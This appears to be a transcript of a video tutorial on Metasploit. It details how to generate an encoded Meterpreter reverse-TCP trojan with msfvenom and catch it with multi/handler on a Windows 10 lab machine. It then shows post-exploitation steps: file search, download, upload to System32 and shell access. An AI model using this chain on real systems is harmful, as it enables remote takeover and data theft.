Lots of attacks can be easily performed on Windows XP, but this operating system is kind of obsolete now, so I will do this demo on Windows 10. So let's get into the bread and butter of this and exploit Windows 10. You can as well practice by downloading and installing the Metasploitable form from the Rapid7 website. Metasploitable is an intentionally vulnerable Linux machine that you can use to evaluate and perform a lot of exploits within Metasploit. So let's explain this attack first on Windows 10. It is very simple. First, we will create a malicious executable program, the payload, for the target host, and then we will run this file on the target host, and it will actually expose its shell to the attacker, which is the Kali machine. And the Kali machine can now remotely control the Windows 10 or the target machine. So let's start here. First of all, we need to run the Metasploit form, Metasploit the framework. Let's start the service. You can run it first directly, or you can use service PostgreSQL start. It will start the database services. After that, we will run the Metasploit using MSF console. It is important to note that this attack can be done on a LAN and over the internet. Just change the IP addresses. So let's use the command called msfvenum. msfvenum is a combination of two commands that are there in Metasploit, which are the msf payload and the msf encode. So now they are both in a single command, which is called msfvenum. So earlier, the msf payload was used to generate the payload in a specific form, and then the msf encode was used to encode the payload using various algorithms. So now you can use one command to do both actions. Now, after that, you specify the payload. Here we will use Windows Metapreter reverse TCP. So this is the payload that we'll be using. As we said, that the victim will expose its shell to us and we will be able to control it remotely. Then we will specify localhost IP, which is my IP. Just a double check here. So my IP is 211.130, 192.168.211.130. Then I will specify the local port, which is, you can choose any port. I'll choose 5555, and then -f, which is the file extension that I will use to generate this payload, which is exe. And then I use -e, which is specifying the encoder. I'll select this encoder. There are lots of encoders, so this is my preferred one, Shikataganai, and then you specify how many iterations this encoder will do to this payload. I'll select 10 iterations, and then create a file called, what do you want to call it, Trojan. Let's create a file called trojan.exe. Execute that, and actually this will create a file, the Trojan file, for us. Let's open a new terminal here. As you can see that the file has been created with a size of 73802 bytes. Just to double check, just list it here and you'll be able to see that the trojan.exe file has been created. So now we are ready to move the file to the victim's machine and execute it there. And upon successful execution, the target system will be fully compromised and we will be able to control it remotely. And the result will be a Metapreter call for us, which is a command line for us to perform any type of command remotely. So as we did before, we mounted this folder to the Windows 10 machine. So let's just copy the file that we've just created, which is trojan.exe. Let's just move it to Windows machine, Windows mount, and let's go to the Windows machine. So here on the Windows machine, you just double click on the trojan.exe and it will execute. Now we go to our Kali machine and we'll just issue this command, use, just issue it in the Metasploit, use multi-handler, then set payload Windows Metapreter reverse TCP, then set lhost to 192.168.211.130, then set lport to the port that we set before, 5555, to listen to the incoming connections on this port. And now all we need to do is to exploit. So as you can see here, that this session has started a reverse TCP handler on the IP 211.130, which is our IP. So if you go again to the Windows machine and double click on this file, a Meterpreter session will be open between the two IPs, 130 and 129. And now we have shell here that we can use to do whatever we want. So let's first use help. You can see all the commands that you can run here on the shell that just opened, the Meterpreter. This is very important. Just start by typing help and it will guide you through all the commands. You can, for example, use sysinfo just to see the system info of Windows 10. As you can see, the computer name, the OS, the architecture, the domain or the work group, and the currently logged on users. You can use ls to list the directory, the current directories. You can use as well ipconfig to see the network configurations of the remote machine. You can as well use the search command to search for any file on this remote machine. So get me all the files that have the doc extension on this remote machine, and these are the files. You can as well search for files of type .txt on the remote machine. It will get you all the files with this extension. You can as well select any file and choose to download it. So I want to download this Hobbit file. Just paste it and make sure to change the backslash to /. You can go to new terminal and just press list and you'll be able to see the Hobbit file here, the Word file here as well. So this is some of the commands that you can run on the machine. And one of the most important command is the upload command. So you can upload like anything, your Trojan2.exe. You can upload it to C, Windows System 32, whatever. So let's try to upload here, whatever, any file, like hobbit.exe, sorry, hobbit.txt, and it's uploaded successfully. One of the most important commands as well is the shell command. So once you press shell, you'll be able to acquire a Windows shell and you can do all the commands from here.